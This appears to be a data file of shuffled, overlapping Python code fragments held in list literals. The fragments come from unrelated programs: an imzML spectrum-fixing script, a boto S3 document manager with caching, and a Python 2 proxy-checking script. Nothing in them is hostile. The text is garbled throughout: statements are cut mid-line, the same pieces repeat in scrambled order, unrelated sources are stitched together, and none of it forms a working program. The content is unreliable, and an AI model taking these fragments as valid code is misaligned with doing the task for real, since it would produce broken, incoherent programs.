ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for", "try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if", "data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0))", "ImzMLParser(imzml_path) print('-- Done --\\n') with ImzMLWriter(os.path.join(data_path, f'{imzml_file[:-6]}_fixed.imzML'), polarity=polarity_str) as writer: for idx, coords", "= p.getspectrum(idx) writer.addSpectrum(mzs, intensities, coords) except ValueError: writer.addSpectrum(np.zeros(0), np.zeros(0)) if __name__ == '__main__':", "coords in enumerate(tqdm(p.coordinates, desc='Loading MS data')): try: mzs, intensities = p.getspectrum(idx) writer.addSpectrum(mzs, intensities," ]
[ "return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not", "boto.s3.key import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from", ".doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents", "operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager", "new instance of DocManager class 'bucketConnString' : connection string of s3 bucket in", "import json import calendar import time from boto.s3.connection import S3Connection from boto.s3.key import", "boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import getCache from .constants", "\"\"\" Manage documents stored in cloud. Contains functions for CRUD operations on documents", "allowed there is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents =", "keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return", "in cloud. Contains functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\"", "Contains functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a", "is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents)", "maximum size # allowed there is only 2kb. tags = dict(doc.tags) tags['content'] =", "docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def", "which docs are stored. 
\"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900", "keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None)", "bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit):", "parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified)", "directly in blob's metadata as the maximum size # allowed there is only", "S3Connection from boto.s3.key import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME,", "k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content", "= os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn", "import calendar import time from boto.s3.connection import S3Connection from boto.s3.key import Key from", "docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content',", "= Key(self.__getBucket()) k.key = doc.key # not storing tags directly in blob's metadata", "from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import getCache from", "cloud. 
Contains functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates", "Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents)", "= json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags)", "self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self,", "if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey,", "as the maximum size # allowed there is only 2kb. tags = dict(doc.tags)", "tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey):", "calendar import time from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper", "storing tags directly in blob's metadata as the maximum size # allowed there", "DocManager: \"\"\" Manage documents stored in cloud. 
Contains functions for CRUD operations on", "class 'bucketConnString' : connection string of s3 bucket in which docs are stored.", "Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in", "= self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def", "DocManager class 'bucketConnString' : connection string of s3 bucket in which docs are", "< timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\", "(FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key", "keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry)", "content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key = docKey k.delete() self.cache.delete(docKey)", "parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager:", "def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name)", "= dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def", "not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key #", "LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t):", "def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key", "import S3Connection from boto.s3.key import Key from .cachingHelper import getCache from .constants import", "keyContents = self.cache.get(docKey) if not keyContents: k = 
Key(self.__getBucket()) k.key = docKey keyContents", "for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance", "only 2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key,", "= getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit:", "Manage documents stored in cloud. Contains functions for CRUD operations on documents \"\"\"", "\\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key =", "= storedTags return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key", "k.key = doc.key # not storing tags directly in blob's metadata as the", "return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key = docKey", "\"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. 
Contains functions for CRUD", "k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags", "def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self,", "content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def delete(self,", "getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return", "keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey)", "timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket())", "import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from", "def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not storing tags", "from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage", "= getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return", "from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString,", "self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags", "key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = 
self.get(key.name) return (doc.tags[LINKTAG_PUBTIME]", "s3 bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache =", "conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc", "validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc =", ": connection string of s3 bucket in which docs are stored. \"\"\" self.bucketConnString", "getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'],", "connection string of s3 bucket in which docs are stored. \"\"\" self.bucketConnString =", "doc.key # not storing tags directly in blob's metadata as the maximum size", "= Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags =", "= k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags", "blob's metadata as the maximum size # allowed there is only 2kb. tags", "return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. 
Contains functions", "tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket())", "__init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString' : connection string", "k = Key(self.__getBucket()) k.key = doc.key # not storing tags directly in blob's", "instance of DocManager class 'bucketConnString' : connection string of s3 bucket in which", "__getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key,", "of DocManager class 'bucketConnString' : connection string of s3 bucket in which docs", "None) tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey): k =", "bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache()", "from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19],", "self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string()", "storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey): k", "not storing tags directly in blob's metadata as the maximum size # allowed", "CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of", "import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class", "# allowed there is only 2kb. 
tags = dict(doc.tags) tags['content'] = doc.content keyContents", "self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k", "storedTags return Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key =", "doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags)", "= doc.key # not storing tags directly in blob's metadata as the maximum", "> timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k =", "getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc", "get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key =", "conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) <", "(doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k", "documents stored in cloud. Contains functions for CRUD operations on documents \"\"\" def", ".constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc", "import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored", "and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key", "_getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. 
Contains", "False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in", "keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k =", "= docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content =", "'bucketConnString' : connection string of s3 bucket in which docs are stored. \"\"\"", "metadata as the maximum size # allowed there is only 2kb. tags =", "import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def", "class DocManager: \"\"\" Manage documents stored in cloud. Contains functions for CRUD operations", "the maximum size # allowed there is only 2kb. tags = dict(doc.tags) tags['content']", "Key(self.__getBucket()) k.key = doc.key # not storing tags directly in blob's metadata as", "functions for CRUD operations on documents \"\"\" def __init__(self): \"\"\" Instantiates a new", ".cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection", "from boto.s3.key import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER", "# not storing tags directly in blob's metadata as the maximum size #", "if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit)", "\"\"\" Instantiates a new instance of DocManager class 'bucketConnString' : connection string of", "json import calendar import time from boto.s3.connection import S3Connection from boto.s3.key import Key", "= self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents =", "FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import Doc def 
_getEpochSecs(t): return", "time from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import getCache", "documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString'", "def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud.", "timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER", "tags directly in blob's metadata as the maximum size # allowed there is", "stored in cloud. Contains functions for CRUD operations on documents \"\"\" def __init__(self):", "getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\"", "string of s3 bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING']", "self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString)", "os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn =", "= parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if", "os import json import calendar import time from boto.s3.connection import S3Connection from boto.s3.key", "calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\")) class DocManager: \"\"\" Manage documents stored in cloud. 
Contains functions for", "self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey,", "self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString)", "2kb. tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents,", "return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def __isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False", "= storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def delete(self, docKey):", "import Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper", "of s3 bucket in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache", "dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self,", "stored. 
\"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams", "\"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams =", "900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False) def", "return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and \\ (FEEDTAG_DO_NOT_CLUSTER not in doc.tags) def put(self, doc):", "on documents \"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager class", "import time from boto.s3.connection import S3Connection from boto.s3.key import Key from .cachingHelper import", "in which docs are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry=", "k.get_contents_as_string() self.cache.set(docKey, keyContents, self.__cacheExpiry) storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags =", "in doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not", "in blob's metadata as the maximum size # allowed there is only 2kb.", "self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket())", "docKey): keyContents = self.cache.get(docKey) if not keyContents: k = Key(self.__getBucket()) k.key = docKey", "json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not", "import os import json import calendar import time from boto.s3.connection import S3Connection from", "timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return 
(doc.tags[LINKTAG_PUBTIME] >", "Instantiates a new instance of DocManager class 'bucketConnString' : connection string of s3", "put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not storing tags directly", "k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if not keyContents:", "a new instance of DocManager class 'bucketConnString' : connection string of s3 bucket", "self.__cacheExpiry= 900 def __getBucket(self): bucketConnParams = parseConnectionString(self.bucketConnString) conn = getS3Connection(self.bucketConnString) return conn.get_bucket(bucketConnParams['bucketName'], validate=False)", "Key from .cachingHelper import getCache from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import", "__isDocNew(self, key, timeLimit): if _getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return", "doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents =", ".dbhelper import parseConnectionString, getS3Connection from .doc import Doc def _getEpochSecs(t): return calendar.timegm(time.strptime(t[:19], \"%Y-%m-%dT%H:%M:%S\"))", "= json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents = self.cache.get(docKey) if", "_getEpochSecs(key.last_modified) < timeLimit: return False doc = self.get(key.name) return (doc.tags[LINKTAG_PUBTIME] > timeLimit) and", "are stored. \"\"\" self.bucketConnString = os.environ['DOCSBUCKET_CONNECTIONSTRING'] self.cache = getCache() self.__cacheExpiry= 900 def __getBucket(self):", "there is only 2kb. 
tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags)", "from .constants import LINKTAG_PUBTIME, FEEDTAG_DO_NOT_CLUSTER from .dbhelper import parseConnectionString, getS3Connection from .doc import", "doc): k = Key(self.__getBucket()) k.key = doc.key # not storing tags directly in", "Doc(docKey, content, tags) def delete(self, docKey): k = Key(self.__getBucket()) k.key = docKey k.delete()", "storedTags = json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content,", "not keyContents: k = Key(self.__getBucket()) k.key = docKey keyContents = k.get_contents_as_string() self.cache.set(docKey, keyContents,", "\"\"\" def __init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString' :", "doc.tags) def put(self, doc): k = Key(self.__getBucket()) k.key = doc.key # not storing", "def __init__(self): \"\"\" Instantiates a new instance of DocManager class 'bucketConnString' : connection", "size # allowed there is only 2kb. tags = dict(doc.tags) tags['content'] = doc.content", "tags = dict(doc.tags) tags['content'] = doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry)", "json.loads(keyContents) content = storedTags.pop('content', None) tags = storedTags return Doc(docKey, content, tags) def", "= doc.content keyContents = json.dumps(tags) k.set_contents_from_string(keyContents) self.cache.set(k.key, keyContents, self.__cacheExpiry) def get(self, docKey): keyContents" ]
[ "', e.code return e.code except Exception, detail: print \"ERROR:\", detail return 1 return", "= open(\"new.txt\", 'w') count = 0 for item in proxyList: if is_bad_proxy(item): print", "return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line", "else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" + str(count) x.close() f.close()", "the list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http':", "= urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') #", "open(\"new.txt\", 'w') count = 0 for item in proxyList: if is_bad_proxy(item): print \"Bad", "\"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in f: line =", "filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in f:", "in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count", "url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return", "address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code", "is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1; else: x.write(item); x.write('\\n');", "= count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \"", "Exception, detail: print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f", "urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except Exception, detail: print", "return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = [];", "of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener", "'Error code: ', e.code 
return e.code except Exception, detail: print \"ERROR:\", detail return", "for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\",", "def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent',", "= line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0 for", "proxyList = []; for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList", "if is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1; else: x.write(item);", "f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count =", "= 0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count", "item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count +", "import urllib2, socket socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList", "0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count =", "except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except Exception, detail:", "proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener =", "+ 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" + str(count)", "socket socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList def is_bad_proxy(pip):", "read the list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler =", "count = count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES", "= [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except", "pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) 
req=urllib2.Request('http://www.google.com') # change the", "in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders", "sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except Exception,", "code: ', e.code return e.code except Exception, detail: print \"ERROR:\", detail return 1", "opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req)", "proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders =", "change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ',", "'w') count = 0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\",", "detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList =", "\"Bad Proxy\", item count = count + 1; else: x.write(item); x.write('\\n'); print \"SO", "print 'Error code: ', e.code return e.code except Exception, detail: print \"ERROR:\", detail", "proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1; else:", "# read the list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler", "= []; for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x", "e: print 'Error code: ', e.code return e.code except Exception, detail: print \"ERROR:\",", "proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0 for item in", "proxyList x = open(\"new.txt\", 'w') count = 0 for item in proxyList: if", "count = 0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item", "opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] 
urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url", "item count = count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD", "line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w')", "= open(filename) proxyList = []; for line in f: line = line.rstrip('\\n') proxyList.append(line)", "open(filename) proxyList = []; for line in f: line = line.rstrip('\\n') proxyList.append(line) print", "list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip})", "except Exception, detail: print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\"", "= \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in f: line", "[('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError,", "'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here 